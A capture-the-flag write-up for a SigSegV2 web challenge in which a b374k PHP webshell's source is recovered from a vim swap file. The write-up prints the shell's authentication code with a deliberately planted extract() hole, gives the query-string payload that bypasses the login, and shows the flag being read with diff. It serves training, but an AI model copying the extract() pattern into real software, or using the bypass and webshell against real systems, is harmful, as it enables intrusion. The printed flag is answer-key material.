Date | Author | Contact | Version | Comment |
---|---|---|---|---|
24/11/2019 | noraj (Alexandre ZANNI) | noraj#0833 on discord | 1.0 | Document creation |
Information displayed for CTF players:
- Name of the challenge / Nom du challenge:
Une porte peut en cacher une autre
- Category / Catégorie:
Web
- Internet: not needed
- Difficulty / Difficulté: Medium / Moyen
A very famous backdoor was placed on the website, but hopefully it is password protected.
Flag format: sigsegv{flag}
author: [noraj](https://pwn.by/noraj/)
- Hint1: b374k.php
- Hint2: vim
This challenge require a Docker Engine and Docker Compose.
Builds, (re)creates, starts, and attaches to containers for a service:
$ docker-compose up --build
Add -d
if you want to detach the container.
The webshell is b374k.php
.
The comment on the home page says the hacker used vim.
Let's look for a .swp
vim backup file: b374k.php.swp
.
Let's look at the code:
$GLOBALS['pass'] = "09c7018841af655c9b025c0a3e5b167d05f42cd1"; // sha1(md5(pass))
...
$GLOBALS['login'] = 1;
@extract($_REQUEST["noraj"], EXTR_OVERWRITE);
...
if(!function_exists('auth')){
function auth(){
if(isset($GLOBALS['pass']) && (trim($GLOBALS['pass'])!='')){
$c = $_COOKIE;
$p = $_POST;
if($GLOBALS['login'] == 0 || isset($p['pass'])){
$your_pass = sha1(md5($p['pass']));
if($GLOBALS['login'] == 0 || $your_pass==$GLOBALS['pass']){
setcookie("pass", $GLOBALS['pass'], time()+36000, "/");
header("Location: b374k.php");
}
}
It's no use to try to guess the password, it is sha1(md5(pass))
of a strong one.
But we can see there is $GLOBALS['login'] = 1;
, like login enabled and then
there are $GLOBALS['login'] == 0 || isset($p['pass'])
and
$GLOBALS['login'] == 0 || $your_pass==$GLOBALS['pass']
. So if
$GLOBALS['login'] == 0
the login feature will be disable and we will gain
access to the shell without using a password.
extract
allows to Import variables into the current symbol table from and to
overwrite it. So let's use it to overwrite $GLOBALS['login']
and bypass the
authentication.
The payload is http://x.x.x.x/b374k.php?noraj[login]=0
or just
http://x.x.x.x/b374k.php?noraj[login]
.
So we have a webshell but most of useful binaries for listing directories or reading a file were removed.
We have two options, do it in pure PHP or find a non-removed binary.
For example reading the flag with diff
:
/usr/src/app/>diff /home/noraj/flag.txt /etc/hostname
--- /home/noraj/flag.txt
+++ /etc/hostname
@@ -1 +1 @@
-sigsegv{∙∙∙∙∙·▫▫ᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒnorajᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒ▫▫·∙∙∙∙∙}
\ No newline at end of file
+da3acf79d34a
More about backdored backdoors: https://rawsec.ml/en/c99-php-backdoor-backdoored/
sigsegv{∙∙∙∙∙·▫▫ᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒnorajᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒ▫▫·∙∙∙∙∙}
A web challenge that was available during SigSegV2 CTF (2019).
10 teams on 36 flaged this challenge.